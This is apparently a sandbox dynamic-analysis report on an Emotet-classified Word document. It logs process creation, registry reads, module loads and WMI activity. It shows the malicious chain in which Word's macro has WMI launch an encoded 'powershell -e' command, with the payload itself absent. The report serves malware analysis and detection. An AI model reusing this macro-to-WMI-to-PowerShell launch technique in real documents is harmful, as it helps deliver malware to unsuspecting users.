2d2fa291...85b4 | Grouped Behavior
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Downloader

emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc

Word Document

Created at 2019-04-14T14:36:00

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x8e8 Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n -
#2 0x370 RPC Server System (Elevated) svchost.exe C:\Windows\system32\svchost.exe -k netsvcs #1
#4 0xadc RPC Server System (Elevated) wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding #2
#5 0xb08 Child Process Medium powershell.exe powershell -e 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 #4

Behavior Information - Grouped by Category

Process #1: winword.exe
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:48, Reason: Analysis Target
Unmonitor End Time: 00:03:59, Reason: Self Terminated
Monitor Duration 00:03:10
OS Process Information
Information Value
PID 0x8e8
Parent PID 0x458 (c:\windows\explorer.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x06A19254 0x06A19293 Marked Executable - 64-bit - False False
winword.exe 0x13F2A0000 0x13F47BFFF Forced - 64-bit - False False
buffer 0x06A19254 0x06A19293 Content Changed - 64-bit 0x06A1925C False False
buffer 0x0AFB5B84 0x0AFB5BC7 Marked Executable - 64-bit - False False
buffer 0x0AFB5FC4 0x0AFB6003 Marked Executable - 64-bit - False False
buffer 0x0AFB6084 0x0AFB60C3 Marked Executable - 64-bit - False False
buffer 0x0AFB6084 0x0AFB60C3 Content Changed - 64-bit 0x0AFB6084 False False
buffer 0x0AFDB864 0x0AFDB8AF Marked Executable - 64-bit - False False
buffer 0x0AFDB864 0x0AFDB8AF Content Changed - 64-bit 0x0AFDB864 False False
Host Behavior
COM (9)
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 2
Fn
Create WbemDefaultPathParser IWbemPath cls_context = CLSCTX_INPROC_SERVER True 5
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\.\root\cimv2 True 1
Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\.\root\cimv2 True 1
Fn
Registry (55)
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Licenses - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 - False 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\9 - False 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting - True 1
Fn
Read Value HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 data = } False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = RequireDeclaration, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = CompileOnDemand, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BackGroundCompile, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnAllErrors, data = 255, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnServerErrors, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 2
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 data = C:\Windows\system32\stdole2.tlb True 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = VbaCapability, data = 216 False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Impersonation Level, data = 3 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Namespace True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting value_name = Default Namespace, data = 114 True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Process (1)
Operation Process Additional Information Success Count Logfile
Create powershell -e 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 - True 1
Fn
Module (167)
Operation Module Additional Information Success Count Logfile
Load Comctl32.dll base_address = 0x7fefbbe0000 True 1
Fn
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x7fee2ce0000 True 1
Fn
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL base_address = 0x7fee2cb0000 True 1
Fn
Load OLEAUT32.DLL base_address = 0x7fefd480000 True 1
Fn
Load VBE7.DLL base_address = 0x7fee3780000 True 15
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\program files\microsoft office\root\office16\winword.exe base_address = 0x13f2a0000 True 1
Fn
Get Handle c:\windows\system32\msi.dll base_address = 0x7fef9580000 True 1
Fn
Get Handle C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x0 False 1
Fn
Get Handle c:\windows\system32\user32.dll base_address = 0x76f40000 True 1
Fn
Get Handle c:\windows\system32\oleaut32.dll base_address = 0x7fefd480000 True 1
Fn
Get Filename - process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 3
Fn
Get Address c:\windows\system32\msi.dll function = MsiProvideQualifiedComponentA, address_out = 0x7fef9603b3c True 1
Fn
Get Address c:\windows\system32\msi.dll function = MsiGetProductCodeA, address_out = 0x7fef95fa13c True 1
Fn
Get Address c:\windows\system32\msi.dll function = MsiReinstallFeatureA, address_out = 0x7fef9601618 True 1
Fn
Get Address c:\windows\system32\msi.dll function = MsiProvideComponentA, address_out = 0x7fef95ff088 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoVBADigSigCallDlg, address_out = 0x7fee2de72c0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoVbaInitSecurity, address_out = 0x7fee2d560b0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFIEPolicyAndVersion, address_out = 0x7fee2d01a60 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee2d55f50 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFInitOffice, address_out = 0x7fee2cff000 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoUninitOffice, address_out = 0x7fee2cee860 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFGetFontSettings, address_out = 0x7fee2ce3fc0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoRgchToRgwch, address_out = 0x7fee2cf2380 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoHrSimpleQueryInterface, address_out = 0x7fee2ce7b80 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoHrSimpleQueryInterface2, address_out = 0x7fee2ce7b20 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFCreateControl, address_out = 0x7fee2ce8730 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFLongLoad, address_out = 0x7fee2e23260 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFLongSave, address_out = 0x7fee2e23280 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFGetTooltips, address_out = 0x7fee2cf1f40 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFSetTooltips, address_out = 0x7fee2d56370 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFLoadToolbarSet, address_out = 0x7fee2d44590 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFCreateToolbarSet, address_out = 0x7fee2ce55b0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoHpalOffice, address_out = 0x7fee2cf0240 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFWndProcNeeded, address_out = 0x7fee2ce3d10 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFWndProc, address_out = 0x7fee2ce6d30 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFCreateITFCHwnd, address_out = 0x7fee2ce3d40 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoDestroyITFC, address_out = 0x7fee2cee6f0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee2cedf40 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFGetComponentManager, address_out = 0x7fee2ce7bf0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoMultiByteToWideChar, address_out = 0x7fee2cefcd0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoWideCharToMultiByte, address_out = 0x7fee2ce8b20 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoHrRegisterAll, address_out = 0x7fee2de2ef0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFSetComponentManager, address_out = 0x7fee2cf42c0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFCreateStdComponentManager, address_out = 0x7fee2ce3e20 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFHandledMessageNeeded, address_out = 0x7fee2ceab10 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoPeekMessage, address_out = 0x7fee2cea7d0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFCreateIPref, address_out = 0x7fee2ce1550 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoDestroyIPref, address_out = 0x7fee2cee830 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoChsFromLid, address_out = 0x7fee2ce13d0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoCpgFromChs, address_out = 0x7fee2ce6660 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoSetLocale, address_out = 0x7fee2ce1500 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee2ce3dd0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoSetVbaInterfaces, address_out = 0x7fee2de71e0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = MsoGetControlInstanceId, address_out = 0x7fee2db6d10 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = VbeuiFIsEdpEnabled, address_out = 0x7fee2e298e0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll function = VbeuiEnterpriseProtect, address_out = 0x7fee2e29830 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SysFreeString, address_out = 0x7fefd481320 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = LoadTypeLib, address_out = 0x7fefd48f1e0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = RegisterTypeLib, address_out = 0x7fefd4dcaa0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = QueryPathOfRegTypeLib, address_out = 0x7fefd511760 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = UnRegisterTypeLib, address_out = 0x7fefd5120d0 True 2
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleTranslateColor, address_out = 0x7fefd4ac760 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleCreateFontIndirect, address_out = 0x7fefd4decd0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleCreatePictureIndirect, address_out = 0x7fefd4de840 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleLoadPicture, address_out = 0x7fefd4ef420 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleCreatePropertyFrameIndirect, address_out = 0x7fefd4e4ec0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleCreatePropertyFrame, address_out = 0x7fefd4e9350 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleIconToCursor, address_out = 0x7fefd4b6e40 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = LoadTypeLibEx, address_out = 0x7fefd48a550 True 2
Fn
Get Address c:\windows\system32\oleaut32.dll function = OleLoadPictureEx, address_out = 0x7fefd4ef320 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetSystemMetrics, address_out = 0x76f594f0 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromWindow, address_out = 0x76f55f08 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromRect, address_out = 0x76f52b00 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromPoint, address_out = 0x76f4ab64 True 1
Fn
Get Address c:\windows\system32\user32.dll function = EnumDisplayMonitors, address_out = 0x76f55c30 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetMonitorInfoA, address_out = 0x76f4a730 True 1
Fn
Get Address c:\windows\system32\user32.dll function = EnumDisplayDevicesA, address_out = 0x76f4a5b4 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = DispCallFunc, address_out = 0x7fefd482270 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = CreateTypeLib2, address_out = 0x7fefd50dbd0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDateFromUdate, address_out = 0x7fefd485c90 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarUdateFromDate, address_out = 0x7fefd486330 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = GetAltMonthNames, address_out = 0x7fefd4a66c0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarNumFromParseNum, address_out = 0x7fefd484710 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarParseNumFromStr, address_out = 0x7fefd4848f0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecFromR4, address_out = 0x7fefd4bb640 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecFromR8, address_out = 0x7fefd4bb360 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecFromDate, address_out = 0x7fefd4c2640 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecFromI4, address_out = 0x7fefd4a58a0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecFromCy, address_out = 0x7fefd4a5820 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarR4FromDec, address_out = 0x7fefd4baf20 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = GetRecordInfoFromTypeInfo, address_out = 0x7fefd4da0c0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = GetRecordInfoFromGuids, address_out = 0x7fefd512160 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArrayGetRecordInfo, address_out = 0x7fefd4a5af0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArraySetRecordInfo, address_out = 0x7fefd4a5a90 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArrayGetIID, address_out = 0x7fefd4a5a60 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArraySetIID, address_out = 0x7fefd4a5a30 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArrayCopyData, address_out = 0x7fefd4860b0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArrayAllocDescriptorEx, address_out = 0x7fefd483e90 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = SafeArrayCreateEx, address_out = 0x7fefd4d9f80 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarFormat, address_out = 0x7fefd509b20 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarFormatDateTime, address_out = 0x7fefd509aa0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarFormatNumber, address_out = 0x7fefd509990 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarFormatPercent, address_out = 0x7fefd509890 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarFormatCurrency, address_out = 0x7fefd509770 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarWeekdayName, address_out = 0x7fefd4eb8d0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarMonthName, address_out = 0x7fefd4eb800 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarAdd, address_out = 0x7fefd5048e0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarAnd, address_out = 0x7fefd509470 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarCat, address_out = 0x7fefd5096a0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDiv, address_out = 0x7fefd502fe0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarEqv, address_out = 0x7fefd509cf0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarIdiv, address_out = 0x7fefd508ff0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarImp, address_out = 0x7fefd509c00 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarMod, address_out = 0x7fefd508e60 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarMul, address_out = 0x7fefd503690 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarOr, address_out = 0x7fefd5092d0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarPow, address_out = 0x7fefd502e80 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarSub, address_out = 0x7fefd503f90 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarXor, address_out = 0x7fefd5091a0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarAbs, address_out = 0x7fefd4e7c30 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarFix, address_out = 0x7fefd4e7a60 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarInt, address_out = 0x7fefd4e7890 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarNeg, address_out = 0x7fefd4e7ea0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarNot, address_out = 0x7fefd509600 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarRound, address_out = 0x7fefd4e76a0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarCmp, address_out = 0x7fefd5083f0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecAdd, address_out = 0x7fefd4b3070 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarDecCmp, address_out = 0x7fefd4bd700 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarBstrCat, address_out = 0x7fefd4bd890 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarCyMulI4, address_out = 0x7fefd49caf0 True 1
Fn
Get Address c:\windows\system32\oleaut32.dll function = VarBstrCmp, address_out = 0x7fefd4a8a00 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbeui.dll address_out = 0x7fee2cefcd0 True 1
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll function = 573, address_out = 0x7fee38eafec True 3
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll function = 575, address_out = 0x7fee38eb100 True 3
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll function = 584, address_out = 0x7fee3a93440 True 3
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll function = 614, address_out = 0x7fee3a93304 True 3
Fn
Get Address c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\vba\vba7.1\vbe7.dll function = 626, address_out = 0x7fee3ac2a80 True 3
Fn
Get Address c:\windows\system32\advapi32.dll function = DuplicateTokenEx, address_out = 0x7fefd71d310 True 1
Fn
Window (1)
Operation Window Name Additional Information Success Count Logfile
Create - class_name = ThunderMain, wndproc_parameter = 0 True 1
Fn
System (31)
Operation Additional Information Success Count Logfile
Get Cursor x_out = 1328, y_out = 694 True 2
Fn
Get Cursor x_out = 630, y_out = 293 True 1
Fn
Get Time type = System Time, time = 2019-04-14 14:37:00 (UTC) True 1
Fn
Get Time type = Ticks, time = 129995 True 1
Fn
Get Time type = Performance Ctr, time = 18447153159 True 1
Fn
Get Time type = Local Time, time = 2019-04-14 14:37:04 (Local Time) True 4
Fn
Get Time type = Local Time, time = 2019-04-14 14:37:05 (Local Time) True 12
Fn
Get Time type = System Time, time = 2019-04-14 14:37:07 (UTC) True 1
Fn
Get Time type = Ticks, time = 136547 True 1
Fn
Get Time type = Performance Ctr, time = 19480767813 True 1
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Operating System True 3
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Environment (1)
Operation Additional Information Success Count Logfile
Get Environment String name = DDRYBUR False 1
Fn
Process #2: svchost.exe
Information Value
ID #2
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:02, Reason: RPC Server
Unmonitor End Time: 00:04:56, Reason: Terminated by Timeout
Monitor Duration 00:03:54
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x370
Parent PID 0x1cc (c:\windows\system32\services.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
